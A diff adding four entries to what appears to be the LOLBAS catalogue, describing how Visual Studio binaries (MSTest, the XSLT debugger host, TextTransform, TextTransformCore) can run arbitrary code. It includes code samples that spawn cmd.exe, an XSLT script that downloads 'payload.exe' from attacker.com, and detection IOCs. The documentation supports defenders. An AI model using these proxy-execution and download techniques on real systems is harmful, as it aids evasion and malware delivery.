LOLBAS-Project · Pumi96 · Apr 2, 2026 · Apr 2, 2026 · Apr 2, 2026 · Apr 2, 2026
@@ -0,0 +1,40 @@
+---
+Name: MSTest.exe
+Description: Legacy Test Execution Command Line Tool included with Visual Studio. Loads and executes .NET test assemblies which can contain arbitrary code.
+Author: Noam Pomerantz
+Created: 2026-04-03
+Commands:
+  - Command: MSTest.exe /testcontainer:{PATH:.dll} /resultsfile:{OUTPUT_FILE}
+    Description: Loads a .NET assembly as a test container and executes all methods decorated with the TestMethod attribute. The test methods run with full .NET Framework access, allowing arbitrary code execution.
+    Usecase: Proxy execution of arbitrary .NET code by packaging it as a unit test DLL. A test runner executing attacker-controlled assemblies is unexpected outside a development context.
+    Category: Execute
+    Privileges: User
+    MitreID: T1218
+    OperatingSystem: Windows 10, Windows 11
+Full_Path:
+  - Path: C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\MSTest.exe
+  - Path: C:\Program Files\Microsoft Visual Studio\2022\Professional\Common7\IDE\MSTest.exe
+  - Path: C:\Program Files\Microsoft Visual Studio\2022\Enterprise\Common7\IDE\MSTest.exe
+Code_Sample:
+  - Code: |-
+      // Compile with: csc.exe /target:library /reference:"C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\ReferenceAssemblies\v4.0\Microsoft.VisualStudio.QualityTools.UnitTestFramework.dll" /out:MaliciousTest.dll MaliciousTest.cs
+      using Microsoft.VisualStudio.TestTools.UnitTesting;
+      using System.Diagnostics;
+      [TestClass]
+      public class LolbasTest
+      {
+          [TestMethod]
+          public void Execute()
+          {
+              Process.Start("cmd.exe");
+          }
+      }
+Detection:
+  - IOC: MSTest.exe process execution outside of a typical Visual Studio development or CI/CD context.
+  - IOC: MSTest.exe loading test assemblies from unusual directories such as %TEMP% or user profile folders.
+  - IOC: Unexpected child processes (e.g., cmd.exe, powershell.exe) spawning directly from MSTest.exe.
+Resources:
+  - Link: https://learn.microsoft.com/en-us/visualstudio/test/walkthrough-using-a-configuration-file-to-define-a-data-source
+Acknowledgement:
+  - Person: Noam Pomerantz
+    Handle: '@pumi96'
@@ -0,0 +1,70 @@
+---
+Name: Microsoft.XslDebugger.Host.exe
+Description: XSLT Execution Utility included with Visual Studio for debugging XSLT transformations
+Author: Noam Pomerantz
+Created: 2026-04-05
+Commands:
+  - Command: Microsoft.XslDebugger.Host.exe input.xml payload.xsl /enable:all
+    Description: Executes arbitrary C# code embedded in msxsl:script blocks within an XSLT stylesheet. The /enable:all flag enables inline script compilation and execution via the .NET XSLT engine. Can call Process.Start, WebClient, and any .NET Framework class.
+    Usecase: Execute arbitrary C# code and spawn processes through a Microsoft-signed XSLT debugger binary.
+    Category: Execute
+    Privileges: User
+    MitreID: T1220
+    OperatingSystem: Windows 10, Windows 11
+    Tags:
+      - Execute: XSLT
+  - Command: Microsoft.XslDebugger.Host.exe input.xml download.xsl /enable:all
+    Description: Downloads files from arbitrary URLs using System.Net.WebClient embedded in an XSLT msxsl:script block. The XSLT file contains C# code that calls WebClient.DownloadFile() to save remote content to disk.
+    Usecase: Download files from a remote server using a Microsoft-signed XSLT debugger binary.
+    Category: Download
+    Privileges: User
+    MitreID: T1105
+    OperatingSystem: Windows 10, Windows 11
+    Tags:
+      - Download: HTTP
+Full_Path:
+  - Path: C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\Xml\Microsoft.XslDebugger.Host.exe
+  - Path: C:\Program Files (x86)\Microsoft Visual Studio\2022\Community\Common7\IDE\Xml\Microsoft.XslDebugger.Host.exe
+  - Path: C:\Program Files\Microsoft Visual Studio\2022\Professional\Common7\IDE\Xml\Microsoft.XslDebugger.Host.exe
+  - Path: C:\Program Files\Microsoft Visual Studio\2022\Enterprise\Common7\IDE\Xml\Microsoft.XslDebugger.Host.exe
+Code_Sample:
+  - Code: |-
+      <!-- input.xml -->
+      <?xml version="1.0"?><data>test</data>
+
+      <!-- payload.xsl (Execute) -->
+      <?xml version="1.0"?>
+      <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
+        xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:user="urn:custom">
+        <msxsl:script language="C#" implements-prefix="user"><![CDATA[
+          public string execute() {
+            System.Diagnostics.Process.Start("cmd.exe");
+            return "done";
+          }
+        ]]></msxsl:script>
+        <xsl:template match="/"><xsl:value-of select="user:execute()"/></xsl:template>
+      </xsl:stylesheet>
+
+      <!-- download.xsl (Download) -->
+      <?xml version="1.0"?>
+      <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
+        xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:user="urn:custom">
+        <msxsl:script language="C#" implements-prefix="user"><![CDATA[
+          public string download() {
+            new System.Net.WebClient().DownloadFile("http://attacker.com/payload", @"C:\Users\Public\payload.exe");
+            return "done";
+          }
+        ]]></msxsl:script>
+        <xsl:template match="/"><xsl:value-of select="user:download()"/></xsl:template>
+      </xsl:stylesheet>
+Detection:
+  - IOC: Microsoft.XslDebugger.Host.exe execution outside of devenv.exe parent process
+  - IOC: Microsoft.XslDebugger.Host.exe with /enable:all command-line argument
+  - IOC: Microsoft.XslDebugger.Host.exe spawning child processes (cmd.exe, powershell.exe)
+  - IOC: Microsoft.XslDebugger.Host.exe making outbound HTTP/HTTPS connections
+Resources:
+  - Link: https://learn.microsoft.com/en-us/dotnet/standard/data/xml/xslt-transformations
+  - Link: https://learn.microsoft.com/en-us/dotnet/standard/data/xml/script-blocks-using-msxsl-script
+Acknowledgement:
+  - Person: Noam
+    Handle: '@pumi96'
@@ -0,0 +1,33 @@
+---
+Name: TextTransform.exe
+Description: T4 Text Template transformation tool included with Visual Studio. Processes T4 template files (.tt) that can contain arbitrary C# or VB.NET code which executes during template processing.
+Author: Noam Pomerantz
+Created: 2026-04-03
+Commands:
+  - Command: TextTransform.exe -out {OUTPUT_FILE} {PATH:.tt}
+    Description: Processes a T4 template file (.tt) containing embedded C# code blocks. The C# code executes during template processing with full .NET Framework access.
+    Usecase: Execute arbitrary C# code by embedding it in a T4 template file. Can spawn processes, download files, access the filesystem, and perform any .NET operation.
+    Category: Execute
+    Privileges: User
+    MitreID: T1127
+    OperatingSystem: Windows 10, Windows 11
+Full_Path:
+  - Path: C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\TextTransform.exe
+  - Path: C:\Program Files\Microsoft Visual Studio\2022\Professional\Common7\IDE\TextTransform.exe
+  - Path: C:\Program Files\Microsoft Visual Studio\2022\Enterprise\Common7\IDE\TextTransform.exe
+Code_Sample:
+  - Code: |-
+      <#@ template language="C#" #>
+      <#@ import namespace="System.Diagnostics" #>
+      <#
+          Process.Start("cmd.exe");
+      #>
+Detection:
+  - IOC: TextTransform.exe process execution outside of a typical Visual Studio development context.
+  - IOC: TextTransform.exe processing .tt files from unusual directories such as %TEMP% or user profile folders.
+  - IOC: Unexpected child processes (e.g., cmd.exe, powershell.exe) spawning directly from TextTransform.exe.
+Resources:
+  - Link: https://learn.microsoft.com/en-us/visualstudio/modeling/code-generation-and-t4-text-templates
+Acknowledgement:
+  - Person: Noam Pomerantz
+    Handle: '@pumi96'
@@ -0,0 +1,35 @@
+---
+Name: TextTransformCore.exe
+Description: .NET Core T4 Text Template transformation tool included with Visual Studio. Processes T4 template files (.tt) that can contain arbitrary C# code which executes during template processing.
+Author: Noam Pomerantz
+Created: 2026-04-03
+Commands:
+  - Command: TextTransformCore.exe {PATH:.tt}
+    Description: Processes a T4 template file (.tt) containing embedded C# code blocks. The C# code executes during template processing with .NET Core runtime access.
+    Usecase: Execute arbitrary C# code by embedding it in a T4 template file. Can write files, access the filesystem, and perform .NET operations. Process.Start requires additional assembly references.
+    Category: Execute
+    Privileges: User
+    MitreID: T1127
+    OperatingSystem: Windows 10, Windows 11
+Full_Path:
+  - Path: C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\TextTransformCore.exe
+  - Path: C:\Program Files\Microsoft Visual Studio\2022\Professional\Common7\IDE\TextTransformCore.exe
+  - Path: C:\Program Files\Microsoft Visual Studio\2022\Enterprise\Common7\IDE\TextTransformCore.exe
+Code_Sample:
+  - Code: |-
+      <#@ template language="C#" #>
+      <#@ assembly name="System.Diagnostics.Process" #>
+      <#@ assembly name="System.ComponentModel.Primitives" #>
+      <#@ import namespace="System.Diagnostics" #>
+      <#
+          Process.Start("cmd.exe");
+      #>
+Detection:
+  - IOC: TextTransformCore.exe process execution outside of a typical Visual Studio development context.
+  - IOC: TextTransformCore.exe processing .tt files from unusual directories such as %TEMP% or user profile folders.
+  - IOC: Unexpected child processes (e.g., cmd.exe, powershell.exe) spawning directly from TextTransformCore.exe.
+Resources:
+  - Link: https://learn.microsoft.com/en-us/visualstudio/modeling/code-generation-and-t4-text-templates
+Acknowledgement:
+  - Person: Noam Pomerantz
+    Handle: '@pumi96'